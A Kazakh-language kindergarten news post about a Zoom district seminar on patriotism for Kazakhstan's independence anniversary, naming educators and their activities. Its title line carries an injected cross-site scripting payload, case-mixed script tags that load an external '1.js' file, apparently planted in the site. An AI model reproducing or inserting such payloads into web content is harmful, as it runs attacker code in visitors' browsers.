"Менің сүйікті Қазақстаным" атты аудандық семинар-практикум<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.02.2022

16.02.22 МКҚК "Ақбота" бөбекжайы Циолковский 10 көшесі ҚР тәуелсіздігінің 30 жылдығына  арналған "Менің сүйікті  Қазақстаным" атты аудандық семинар-практикум  zoom   платформасы арқылы өтті.  

Семинардың мақсаты: Отанға деген патриоттық сезімдерін қалыптастыру. Семинар ұйымдастырушылары "Менің сүйікті Қазақстаным"  жобасын ұсынды, "Почемучки" мектепке даярлық топ тәрбиешісі Сергеева А.П. "Шеберлер қаласы" тәрбиеленушілер ермексаз және қағаз, акварель мен жұмыс жасады. Киіз үйді  безендіруге  кеселер, торсықтар,көрпе мен сырмақ жасалды Тәрбиеші Кульгажинова  Ж.Е.  " Бөбекжайда "ұлттық бұрыш" белсенділік орталығын безендіру " атты шебер-сынып ұсынды.

Бурабай ауданы бойынша мектепке дейінгі ұйымдар тәрбиешілері белсене қатысты. Романова Н.А. дене шынықтыру нұсқаушысы "Қазақстан" флешмобын семинар қатысушылармен  өткізді.Елубекова Г.К. қазақ тілі мұғалімі "Менің Қазақстаным- менің болашағым" викторинасын педагогтармен өткізді. Семинардың қорытындысы ретінде аудан педагогтары пікірлер және тілектерімен бөлісіп, бөбекжай ұжымына шығармашылық табыс тіледі.

Просмотров: 258


Пікір қосу



Деректерді қолтаңбаға қосу